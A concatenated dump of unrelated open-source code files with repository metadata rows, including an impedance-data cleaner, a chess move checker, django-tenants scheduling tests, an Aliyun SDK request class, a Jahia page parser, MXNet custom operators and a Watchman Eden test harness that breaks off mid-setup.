        axs[0, 1].set_ylabel('|Z|')
        axs[0, 1].legend(fontsize=8)
        return fig, axs, w, Z
def KKT_clean(w, Z, KKTdata, thres):
    """Remove data points that violate the Kramers-Kronig relations.

    Compares the measured impedance ``Z`` against its KK reconstruction
    ``KKTdata`` and drops every point whose residual exceeds ``thres``
    relative to the corresponding component of ``Z``. Only the component
    (real or imaginary) with the larger total residual is screened.

    Parameters
    ----------
    w : numpy.ndarray
        Frequency values.
    Z : numpy.ndarray
        Measured complex impedance.
    KKTdata : numpy.ndarray
        KK-reconstructed complex impedance.
    thres : float
        Relative residual threshold (e.g. 0.2 == 20 %).

    Returns
    -------
    (numpy.ndarray, numpy.ndarray)
        Frequencies and impedances with the offending points removed.

    Changes vs. the original: the redundant function-local numpy import is
    gone, and the list-wrapped mask + np.where + np.delete dance is replaced
    by direct boolean indexing (identical selection for 1-D arrays).
    """
    res_real = KKTdata.real - Z.real
    res_imag = KKTdata.imag - Z.imag
    # NOTE(review): these are *signed* sums, so positive and negative
    # residuals can cancel when choosing which component to screen —
    # possibly np.abs() was intended; behaviour preserved as-is.
    if np.sum(res_real) > np.sum(res_imag):
        bad = np.abs(res_real) > np.abs(Z.real) * thres
    else:
        bad = np.abs(res_imag) > np.abs(Z.imag) * thres
    keep = ~bad
    return w[keep], Z[keep]
| 35.488 | 101 | 0.516907 |
c8495af283ea9900215809a06168ff061bf5f6ea | 841 | py | Python | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
] | null | null | null | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
] | null | null | null | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
def same_color(x1, y1, x2, y2):
    """Return True when squares (x1, y1) and (x2, y2) have the same colour."""
    # Two squares share a colour exactly when their coordinate sums have
    # the same parity.
    return (x1 + y1) % 2 == (x2 + y2) % 2
def queen(x1, y1, x2, y2):
    """Return True when a queen on (x1, y1) attacks (x2, y2).

    A queen attacks along its row, its column and both diagonals.
    (As in the original, coinciding squares count as attacked.)
    """
    shares_line = x1 == x2 or y1 == y2
    shares_diagonal = abs(x2 - x1) == abs(y2 - y1)
    return shares_line or shares_diagonal
def knight(x1, y1, x2, y2):
    """Return True when a knight on (x1, y1) attacks (x2, y2).

    Every knight move changes one coordinate by 1 and the other by 2,
    so the pair of absolute deltas must be (1, 2) or (2, 1).
    """
    dx = abs(x2 - x1)
    dy = abs(y2 - y1)
    return (dx, dy) in ((1, 2), (2, 1))
# Read the two board squares from stdin, one coordinate per line:
# first square (x1, y1), then second square (x2, y2).
x1 = int(input())
y1 = int(input())
x2 = int(input())
y2 = int(input())

# Output labels are intentionally in Russian (the program's UI language):
# "cells are the same colour", "queen on the first cell attacks the second",
# "knight on the first cell attacks the second".
print("Клетки одного цвета: ", same_color(x1, y1, x2, y2))
print("Ферзь на первой клетке бьет вторую клетку: ", queen(x1, y1, x2, y2))
print("Конь на первой клетке бьет вторую клетку: ", knight(x1, y1, x2, y2))
| 24.735294 | 92 | 0.527943 |
3a7b04626a9e049d7b7477d76dfde7bac642e058 | 5,155 | py | Python | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 4 | 2021-02-26T22:50:47.000Z | 2021-06-05T07:59:43.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 15 | 2021-02-26T22:54:56.000Z | 2022-02-22T18:52:11.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 2 | 2021-12-07T03:57:32.000Z | 2022-02-25T17:37:06.000Z | from celery.schedules import crontab
from django.test import TestCase
from django_tenants_celery_beat.utils import generate_beat_schedule
from tenancy.models import Tenant
class GenerateBeatScheduleTestCase(TestCase):
    """Tests for ``generate_beat_schedule`` covering the combinations of the
    ``public`` / ``all_tenants`` / ``use_tenant_timezone`` tenancy options."""

    TASK = "core.tasks.test_task"

    @classmethod
    def setUpTestData(cls):
        # Two tenants in different timezones, so tenant-timezone handling
        # is observable.
        specs = [
            ("Tenant 1", "tenant1", "Europe/London"),
            ("Tenant 2", "tenant2", "US/Eastern"),
        ]
        Tenant.objects.bulk_create(
            [
                Tenant(name=name, schema_name=schema, timezone=tz)
                for name, schema, tz in specs
            ]
        )

    def _generate(self, schedule, *, public, all_tenants, use_tenant_timezone):
        """Run generate_beat_schedule for one task with the given options."""
        return generate_beat_schedule(
            {
                "task_name": {
                    "task": self.TASK,
                    "schedule": schedule,
                    "tenancy_options": {
                        "public": public,
                        "all_tenants": all_tenants,
                        "use_tenant_timezone": use_tenant_timezone,
                    },
                },
            }
        )

    def _entry(self, schema_name, schedule, use_tenant_timezone):
        """Expected beat-schedule entry for a single schema."""
        return {
            "task": self.TASK,
            "schedule": schedule,
            "options": {
                "headers": {
                    "_schema_name": schema_name,
                    "_use_tenant_timezone": use_tenant_timezone,
                }
            },
        }

    def test_public(self):
        actual = self._generate(
            crontab(), public=True, all_tenants=False, use_tenant_timezone=False
        )
        self.assertEqual(
            actual, {"task_name": self._entry("public", crontab(), False)}
        )

    def test_all_tenants(self):
        actual = self._generate(
            crontab(day_of_month=1),
            public=False,
            all_tenants=True,
            use_tenant_timezone=False,
        )
        expected = {
            "tenant1: task_name": self._entry("tenant1", crontab(day_of_month=1), False),
            "tenant2: task_name": self._entry("tenant2", crontab(day_of_month=1), False),
        }
        self.assertEqual(actual, expected)

    def test_public_all_tenants(self):
        actual = self._generate(
            crontab(day_of_month=1),
            public=True,
            all_tenants=True,
            use_tenant_timezone=False,
        )
        expected = {
            "task_name": self._entry("public", crontab(day_of_month=1), False),
            "tenant1: task_name": self._entry("tenant1", crontab(day_of_month=1), False),
            "tenant2: task_name": self._entry("tenant2", crontab(day_of_month=1), False),
        }
        self.assertEqual(actual, expected)

    def test_use_tenant_timezone(self):
        actual = self._generate(
            crontab(0, 1), public=False, all_tenants=True, use_tenant_timezone=True
        )
        expected = {
            "tenant1: task_name": self._entry("tenant1", crontab(0, 1), True),
            "tenant2: task_name": self._entry("tenant2", crontab(0, 1), True),
        }
        self.assertEqual(actual, expected)
| 34.139073 | 98 | 0.423084 |
75a23d165ab06834cd65428a1c5ac0b5cc414059 | 1,846 | py | Python | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class DescribeGlobalQuestionRequest(RpcRequest):
    """RPC request wrapper for the OutboundBot ``DescribeGlobalQuestion`` API
    (product OutboundBot, API version 2019-12-26), sent via POST."""

    def __init__(self):
        RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'DescribeGlobalQuestion', 'outboundbot')
        self.set_method('POST')
        # Endpoint metadata is only attached on SDK cores exposing these attributes.
        if hasattr(self, "endpoint_map"):
            self.endpoint_map = endpoint_data.getEndpointMap()
        if hasattr(self, "endpoint_regional"):
            self.endpoint_regional = endpoint_data.getEndpointRegional()

    def get_GlobalQuestionId(self):
        """Return the ``GlobalQuestionId`` query parameter (or None)."""
        params = self.get_query_params()
        return params.get('GlobalQuestionId')

    def set_GlobalQuestionId(self, GlobalQuestionId):
        """Set the ``GlobalQuestionId`` query parameter."""
        self.add_query_param('GlobalQuestionId', GlobalQuestionId)

    def get_ScriptId(self):
        """Return the ``ScriptId`` query parameter (or None)."""
        params = self.get_query_params()
        return params.get('ScriptId')

    def set_ScriptId(self, ScriptId):
        """Set the ``ScriptId`` query parameter."""
        self.add_query_param('ScriptId', ScriptId)

    def get_InstanceId(self):
        """Return the ``InstanceId`` query parameter (or None)."""
        params = self.get_query_params()
        return params.get('InstanceId')

    def set_InstanceId(self, InstanceId):
        """Set the ``InstanceId`` query parameter."""
        self.add_query_param('InstanceId', InstanceId)
6a98452e1263179798b6f5dce8af36b9d044726e | 8,141 | py | Python | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 9 | 2017-09-26T08:15:53.000Z | 2019-02-28T12:21:34.000Z | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 768 | 2017-09-15T09:05:48.000Z | 2020-02-12T00:53:06.000Z | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 11 | 2017-10-04T15:00:59.000Z | 2019-07-18T07:05:03.000Z | """(c) All rights reserved. ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE, Switzerland, VPSI, 2017"""
from datetime import datetime
from parser.box import Box
from parser.navigation_page import NavigationPage
from settings import JAHIA_DATE_FORMAT
from parser.sidebar import Sidebar
import logging
import re
from utils import Utils
class PageContent:
    """
    The language specific data of a Page

    Parsing happens eagerly in __init__: title, last-update date, sidebar,
    path/vanity URLs and navigation are extracted from the Jahia XML
    element, and the instance registers itself in
    ``site.pages_content_by_path`` under its computed path.
    """

    def __init__(self, page, language, element):
        self.element = element
        self.page = page
        self.site = page.site
        # WordPress id; left as None here (presumably assigned later,
        # not parsed by this class — confirm against the exporter).
        self.wp_id = None
        self.language = language
        # the relative path, e.g. /team.html
        self.path = ""
        self.vanity_urls = []
        self.boxes = []
        self.sidebar = Sidebar()
        self.last_update = ""
        # a list of NavigationPages
        self.navigation = []
        # the number of occurrences of each tag, e.g. "br" : 10
        self.num_tags = {}

        self.parse_title()

        # last update
        self.parse_last_update()

        # sidebar
        self.parse_sidebar()

        # path — must run before the registration below, which keys on it
        self.set_path()

        # navigation
        self.parse_navigation()

        # add to the site PageContents
        self.site.pages_content_by_path[self.path] = self

    def parse_title(self):
        """
        Page have a default title but it can be overrided by another title.
        :return:
        """
        # For menu title, we have to use default page title
        self.menu_title = self.element.getAttribute("jahia:title")

        self.title = ""

        # Looking if there is an overrided page title (that will be used only on page). We have to look only
        # in direct children otherwise there's a risque we get a child page's title.
        page_list_list = Utils.get_dom_next_level_children(self.element, "pageTitleListList")

        if page_list_list:
            # self.title transiently holds a NodeList here before being
            # replaced by the attribute string below.
            self.title = page_list_list[0].getElementsByTagName('pageTitle')
            if self.title:
                # Can have a value or be empty
                self.title = self.title[0].getAttribute("jahia:value")

        # If page title is empty (equal to "")
        if not self.title:
            # We use the menu title as page title
            self.title = self.menu_title

    def parse_last_update(self):
        """Parse the last update information"""
        date = self.element.getAttribute("jcr:lastModified")

        try:
            if date:
                self.last_update = datetime.strptime(date, JAHIA_DATE_FORMAT)
            else:
                # Missing date is tolerated: last_update stays "" (see __init__).
                logging.warning(
                    "%s - parse - For the page id=%s the last update date is empty",
                    self.site.name, self.page.pid)
        except ValueError as e:
            # Malformed date is fatal: log it, then propagate to the caller.
            logging.error(
                "%s - parse - Invalid last update date for page %s : '%s'",
                self.site.name, self.page.pid, date)
            raise e

    def parse_sidebar(self):
        """ Parse sidebar """
        # search the sidebar in the page xml content
        children = self.element.childNodes
        for child in children:
            if child.nodeName == "extraList":
                for extra in child.childNodes:
                    # Skip anything that is not an element node (e.g. text nodes).
                    if extra.ELEMENT_NODE != extra.nodeType:
                        continue
                    # If we have to skip this box,
                    if extra.getAttribute("jahia:acl") == "break":
                        continue
                    multibox = extra.getElementsByTagName("text").length > 1
                    box = Box(site=self.site, page_content=self, element=extra, multibox=multibox, is_in_sidebar=True)
                    self.sidebar.boxes.append(box)

        nb_boxes = len(self.sidebar.boxes)

        # if we don't have boxes in this sidebar we check the parents:
        # the sidebar is inherited from the nearest ancestor (same language)
        # that has a non-empty one.
        if nb_boxes == 0:
            parent = self.page.parent

            while parent:
                # Check if parent have a content in current lang
                if self.language in parent.contents:
                    sidebar = parent.contents[self.language].sidebar

                    # we found a sidebar with boxes, we stop
                    if len(sidebar.boxes) > 0:
                        self.sidebar = sidebar
                        break

                # otherwise we continue in the hierarchy
                parent = parent.parent

    def set_path(self):
        """
        Set the page path
        """
        if self.page.is_homepage():
            if "en" == self.language:
                self.vanity_urls = ["/index.html"]
            else:
                self.vanity_urls = ["/index-{}.html".format(self.language)]
        else:
            # Vanity URL can have the following content :
            # one URL ==> '/sciences_donnees$$$true$$$true==='
            # many URLs ==> '/sciences_donnees$$$true$$$true===/sciencesdonnees$$$true$$$false==='
            # many URLs ==> '/sciences_donnees$$$true$$$false===/sciencesdonnees$$$true$$$false==='
            vanity_url = self.element.getAttribute("jahia:urlMappings")
            if vanity_url:
                # Going through exploded parts
                for url in vanity_url.split('$$$'):
                    # Cleaning content: strip the true/false flags and '===' separators
                    url = re.sub(r'(true|false)(===)?', '', url)
                    if url:
                        self.vanity_urls.append(url)

            # By default, we also add the "default" page name because it can also be used even if there are
            # vanity URLs defined.
            self.vanity_urls.append("/page-{}-{}.html".format(self.page.pid, self.language))

            # If website has only one language, we also add another way to reach page, the URL without the language
            # FIXME: It may also work if website have more than one language and in this case, URL without language
            # points on the default language URL.
            if len(self.site.languages) == 1:
                # Add if not exists
                url_without_lang = "/page-{}.html".format(self.page.pid)
                if url_without_lang not in self.vanity_urls:
                    self.vanity_urls.append(url_without_lang)

        # FIXME, the prefixing part should be done in exporter
        # add the site root_path at the beginning
        self.path = self.site.root_path + self.vanity_urls[0]

    def parse_navigation(self):
        """Parse the navigation"""
        navigation_pages = self.element.getElementsByTagName("navigationPage")

        for navigation_page in navigation_pages:
            # check if the <navigationPage> belongs to this page
            if not self.site.belongs_to(element=navigation_page, page=self.page):
                continue

            for child in navigation_page.childNodes:
                # internal page declared with <jahia:page>
                if child.nodeName == "jahia:page":
                    template = child.getAttribute("jahia:template")

                    # we don't want the sitemap
                    if not template == "sitemap":
                        ref = child.getAttribute("jcr:uuid")
                        title = child.getAttribute("jahia:title")
                        self.add_navigation_page(type="internal", ref=ref, title=title)
                # internal page declared with <jahia:link>
                elif child.nodeName == "jahia:link":
                    ref = child.getAttribute("jahia:reference")
                    title = child.getAttribute("jahia:title")
                    self.add_navigation_page(type="internal", ref=ref, title=title)
                # external page
                elif child.nodeName == "jahia:url":
                    ref = child.getAttribute("jahia:value")
                    title = child.getAttribute("jahia:title")
                    self.add_navigation_page(type="external", ref=ref, title=title)

    def add_navigation_page(self, type, ref, title):
        """Add a NavigationPage with the given info"""
        navigation_page = NavigationPage(parent=self, type=type, ref=ref, title=title)
        self.navigation.append(navigation_page)
| 37.516129 | 118 | 0.567498 |
66d254c0366bc77f869e921b41ba73a49bffc5f3 | 231 | py | Python | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | null | null | null | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | null | null | null | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | 1 | 2021-02-07T05:57:29.000Z | 2021-02-07T05:57:29.000Z | name = 'causalml'
# Package version string.
__version__ = '0.8.0'
# Public sub-modules exported by ``from causalml import *``.
__all__ = ['dataset',
           'features',
           'feature_selection',
           'inference',
           'match',
           'metrics',
           'optimize',
           'propensity']
| 21 | 31 | 0.450216 |
ea70a57bf3ffdd8d5e007b3cb6ddf805d6640ef5 | 1,398 | py | Python | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | 1 | 2021-10-01T18:37:15.000Z | 2021-10-01T18:37:15.000Z | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | null | null | null | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | 1 | 2021-10-01T18:37:19.000Z | 2021-10-01T18:37:19.000Z | from typing import Dict, Any, NamedTuple, Optional
from typing import NewType
from dataclasses import dataclass
# from dffml.df.types import Definition
class Definition:
    """
    List[type] is how to specify a list
    """
    # NOTE(review): experimental code — calling Definition(...) does NOT
    # return a Definition instance: __new__ hands back a typing.NewType
    # object built from the definition's name and primitive.

    def __new__(cls, *args, **kwargs):
        # Build a throwaway instance just to run __init__ and collect the
        # name/primitive attributes from the constructor arguments.
        obj = super().__new__(cls)
        # print(f"New was called,{args}\n kwargs : {kwargs}")
        obj.__init__(*args, **kwargs)
        # Because the returned object is not an instance of cls, Python
        # will NOT invoke __init__ again on it.
        custom_obj = NewType(obj.name, obj.primitive)
        # custom_obj = type(obj.name,)
        # custom_obj.name = obj.name
        # custom_obj.lock = obj.lock
        # custom_obj.spec = obj.spec
        print("yes")
        return custom_obj

    def __init__(
        self,
        name: str,
        primitive: str,
        lock: bool = False,
        spec: Optional[NamedTuple] = None,
    ):
        # print(f"Init is called")
        self.name = name
        self.primitive = primitive
        self.lock = lock
        self.spec = spec

    def __call__(self, val):
        # Unreached in practice: __new__ always returns a NewType, so no
        # Definition instance escapes to be called.
        pass

    def __repr__(self):
        return self.name

    def __str__(self):
        return repr(self)
# Module-level smoke test. URL ends up being a typing.NewType (see
# Definition.__new__), not a Definition instance.
URL = Definition(name="URL", primitive="str", lock=True)
# print(URL0==URL)
# ss = type("url",("Dict[str,Any]",),{})
def type_test(obj: "URL"):
    # Dummy annotation-experiment target; ignores its argument.
    return 1
# typechecks
aa = "aa"
# URL(aa) is a NewType call, which returns its argument unchanged,
# so this is effectively type_test("aa").
user_a = type_test(URL(aa))
print(user_a)
# does not typecheck; an int is not a UserId
# user_b = get_user_name(-1)
| 22.548387 | 61 | 0.594421 |
627ec62df6cead73846b0f50d165b38207754cde | 4,987 | py | Python | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 249 | 2016-06-17T17:59:14.000Z | 2021-05-31T09:56:17.000Z | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 9 | 2016-09-29T06:11:41.000Z | 2018-11-18T16:09:30.000Z | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 64 | 2016-06-17T22:40:26.000Z | 2020-05-16T00:31:58.000Z | """Customized operators using NDArray GPU API"""
import numpy as np
import mxnet as mx
import pickle as pkl
class LogSumExpOp(mx.operator.CustomOp):
    """Numerically stable log-sum-exp reduction along a configurable axis."""
    def __init__(self, axis):
        self.axis = axis
    def forward(self, is_train, req, in_data, out_data, aux):
        data = in_data[0]
        # Shift by the per-slice maximum before exponentiating to avoid overflow.
        peak = mx.nd.max_axis(data, axis=self.axis, keepdims=True)
        exp_sum = mx.nd.sum(mx.nd.exp(data - peak), axis=self.axis, keepdims=True)
        result = (mx.nd.log(exp_sum) + peak).reshape(out_data[0].shape)
        self.assign(out_data[0], req[0], result)
    def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
        grad = out_grad[0]
        data = in_data[0]
        peak = mx.nd.max_axis(data, axis=self.axis, keepdims=True)
        grad = grad.reshape(peak.shape)
        # d/dx log-sum-exp(x) is softmax(x); scale it by the incoming gradient.
        shifted = mx.nd.exp(data - peak)
        softmax = shifted / mx.nd.sum(shifted, axis=self.axis, keepdims=True)
        self.assign(in_grad[0], req[0], softmax * grad)
@mx.operator.register("log_sum_exp")
class LogSumExpProp(mx.operator.CustomOpProp):
    """Argument/shape metadata for the log_sum_exp custom operator."""
    def __init__(self, axis, keepdims=False):
        super(LogSumExpProp, self).__init__(need_top_grad=True)
        self.axis = int(axis)
        # Custom-op kwargs arrive as strings; only the literal 'True' enables it.
        self.keepdims = keepdims in ('True',)
    def list_arguments(self):
        return ['data']
    def list_outputs(self):
        return ['output']
    def infer_shape(self, in_shape):
        data_shape = in_shape[0]
        # Drop the reduced axis, or keep it with extent 1 when keepdims is set.
        oshape = []
        for dim, extent in enumerate(data_shape):
            if dim != self.axis:
                oshape.append(extent)
            elif self.keepdims:
                oshape.append(1)
        return [data_shape], [tuple(oshape)], []
    def create_operator(self, ctx, shapes, dtypes):
        return LogSumExpOp(self.axis)
def log_sum_exp(in_sym, axis, keepdims=False, name="log_sum_exp"):
    """Symbol-level wrapper around the registered log_sum_exp custom op."""
    return mx.symbol.Custom(
        in_sym,
        name=name,
        op_type="log_sum_exp",
        axis=axis,
        keepdims=keepdims,
    )
class ConstantOp(mx.operator.CustomOp):
    """Custom op that always emits a fixed NDArray; it has no gradient."""
    def __init__(self, data):
        self.data = data
    def forward(self, is_train, req, in_data, out_data, aux):
        # Lazily move the cached constant onto the device of the output
        # the first time contexts differ, then reuse it.
        if self.data.context != out_data[0].context:
            self.data = self.data.copyto(out_data[0].context)
        self.assign(out_data[0], req[0], self.data)
    def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
        raise RuntimeError("cannot bp to constant")
@mx.operator.register("constant")
class ConstantOpProp(mx.operator.CustomOpProp):
    """Metadata for the 'constant' custom op.

    The constant payload travels through the custom-op kwarg channel as a
    pickled string (``pkl_data``) because kwargs must be strings.
    """
    def __init__(self, pkl_data):
        # No gradient flows into a constant, so no top grad is needed.
        super(ConstantOpProp, self).__init__(need_top_grad=False)
        self.data = pkl.loads(pkl_data)
    def list_arguments(self):
        # The op takes no symbolic inputs.
        return []
    def list_outputs(self):
        return ['output']
    def infer_shape(self, in_shape):
        # Output shape is fully determined by the unpickled payload.
        return in_shape, [self.data.shape], []
    def create_operator(self, ctx, shapes, dtypes):
        return ConstantOp(mx.nd.array(self.data))
def constant(data, name="constant"):
    """Build a symbol that always evaluates to `data` (NDArray or numpy array)."""
    if isinstance(data, mx.nd.NDArray):
        data = data.asnumpy()
    # The payload is pickled because custom-op kwargs must be strings.
    return mx.symbol.Custom(name=name,
                            op_type="constant",
                            pkl_data=pkl.dumps(data))
# test cases below
def np_softmax(x, axis):
    """NumPy reference softmax along `axis`, max-shifted for stability."""
    shifted = np.exp(x - np.max(x, axis=axis, keepdims=True))
    return shifted / np.sum(shifted, axis=axis, keepdims=True)
def np_log_sum_exp(x, axis, keepdims=False):
    """NumPy reference log-sum-exp along `axis`, max-shifted for stability."""
    peak = np.max(x, axis=axis, keepdims=True)
    out = peak + np.log(np.sum(np.exp(x - peak), axis=axis, keepdims=True))
    if keepdims:
        return out
    return np.squeeze(out, axis=axis)
def test_log_sum_exp():
    """Check the custom op's forward/backward against the numpy references."""
    xpu = mx.gpu()
    shape = (2, 2, 100)
    axis = 2
    keepdims = True
    X = mx.sym.Variable('X')
    Y = log_sum_exp(X, axis=axis, keepdims=keepdims)
    x = mx.nd.array(np.random.normal(size=shape))
    # Overwrite with a constant input so the expected values are simple.
    x[:] = 1
    xgrad = mx.nd.empty(x.shape)
    exec1 = Y.bind(xpu, args = [x], args_grad = {'X': xgrad})
    exec1.forward()
    y = exec1.outputs[0]
    # Forward must match the numpy reference implementation.
    np.testing.assert_allclose(
        y.asnumpy(),
        np_log_sum_exp(x.asnumpy(), axis=axis, keepdims=keepdims))
    # Feed a gradient of ones; the input gradient should be softmax(x) * 1.
    y[:] = 1
    exec1.backward([y])
    np.testing.assert_allclose(
        xgrad.asnumpy(),
        np_softmax(x.asnumpy(), axis=axis) * y.asnumpy())
def test_constant():
    """Check that a constant symbol forwards its payload and passes gradients through."""
    xpu = mx.gpu()
    shape = (2, 2, 100)
    x = mx.nd.ones(shape, ctx=xpu)
    y = mx.nd.ones(shape, ctx=xpu)
    gy = mx.nd.zeros(shape, ctx=xpu)
    # constant(x) has no inputs, so only 'Y' needs an argument/gradient slot.
    X = constant(x) + mx.sym.Variable('Y')
    xexec = X.bind(xpu,
                   {'Y': y},
                   {'Y': gy})
    xexec.forward()
    np.testing.assert_allclose(
        xexec.outputs[0].asnumpy(), (x + y).asnumpy())
    # The addition passes the output gradient straight through to 'Y'.
    xexec.backward([y])
    np.testing.assert_allclose(
        gy.asnumpy(), y.asnumpy())
# Run both smoke tests when executed as a script (requires a GPU context).
if __name__ == "__main__":
    test_constant()
    test_log_sum_exp()
| 29.684524 | 78 | 0.599158 |
2b26a37c10b5c50aea69f80b8956d25796231621 | 218 | py | Python | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | 4 | 2017-08-23T06:32:19.000Z | 2019-11-05T09:59:24.000Z | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | null | null | null | xfconf/tests/testwmconf.py | cr33dog/pyxfce | ce3fa5e8c556e14a8127d67192484fe2f59b5595 | [
"BSD-3-Clause"
] | 2 | 2017-09-03T17:32:12.000Z | 2021-02-27T20:12:34.000Z | #!/usr/bin/env python
import xfce4.xfconf
print(xfce4.xfconf.list_channels())
wm = xfce4.xfconf.channel_get("xfwm4")
print(wm.get_properties("/"))
wm = xfce4.xfconf.channel_get("xfwm4")
print(wm.get_properties("/"))
| 21.8 | 38 | 0.738532 |
3f3cf211a67e5e881da50b8397c538c691e70861 | 4,395 | py | Python | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | 1 | 2022-03-20T08:44:44.000Z | 2022-03-20T08:44:44.000Z | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | 2 | 2021-09-28T04:34:54.000Z | 2022-02-26T09:11:45.000Z | tests/integration/WatchmanEdenTestCase.py | louissobel/watchman | 461f99e1e22546025a5d3a4fcd28a59bf9809914 | [
"Apache-2.0"
] | null | null | null | # vim:ts=4:sw=4:et:
# Copyright 2016-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import os
import tempfile
import WatchmanInstance
import WatchmanTestCase
# Decide the base class for the test case: use the real Watchman test case
# only when the eden client libraries import cleanly and eden can run here;
# otherwise fall back to a bare `object` so this module stays importable.
TestParent = object
try:
    import configparser  # python3
    from eden.integration.lib import edenclient, hgrepo
    def is_sandcastle():
        return "SANDCASTLE" in os.environ
    if edenclient.can_run_eden():
        TestParent = WatchmanTestCase.WatchmanTestCase
    can_run_eden = edenclient.can_run_eden
except ImportError as e:
    def is_buck_build():
        return "BUCK_BUILD_ID" in os.environ
    # We want import failures to hard fail the build when using buck internally
    # because it means we overlooked something, but we want it to be a soft
    # fail when we run our opensource build
    if is_buck_build():
        raise
    # Stub used when the eden libraries are unavailable.
    def can_run_eden():
        return False
class WatchmanEdenTestCase(TestParent):
    """Base test case that provisions an isolated eden + watchman pair.

    setUp creates a throwaway HOME with its own eden config, starts a
    dedicated watchman instance with that HOME, then starts eden; cleanups
    are registered in reverse order so eden and watchman are torn down and
    the original HOME is restored.
    """
    # The contents of the .eden directory
    # This is used by several tests when checking reported file lists
    eden_dir_entries = [".eden/root", ".eden/socket", ".eden/client", ".eden/this-dir"]
    def setUp(self):
        super(WatchmanEdenTestCase, self).setUp()
        # the eden home directory. We use the global dir for the test runner
        # rather than one scoped to the test because we have very real length
        # limits on the socket path name that we're likely to hit otherwise.
        # fake a home dir so that eden is isolated from the settings
        # of the user running these tests.
        self.eden_home = tempfile.mkdtemp(prefix="eden_home")
        self.eden_dir = os.path.join(self.eden_home, "local/.eden")
        os.makedirs(self.eden_dir)
        self.etc_eden_dir = os.path.join(self.eden_home, "etc-eden")
        os.mkdir(self.etc_eden_dir)
        # The directory holding the system configuration files
        self.system_config_dir = os.path.join(self.etc_eden_dir, "config.d")
        os.mkdir(self.system_config_dir)
        # where we'll mount the eden client(s)
        self.mounts_dir = self.mkdtemp(prefix="eden_mounts")
        self.save_home = os.environ["HOME"]
        os.environ["HOME"] = self.eden_home
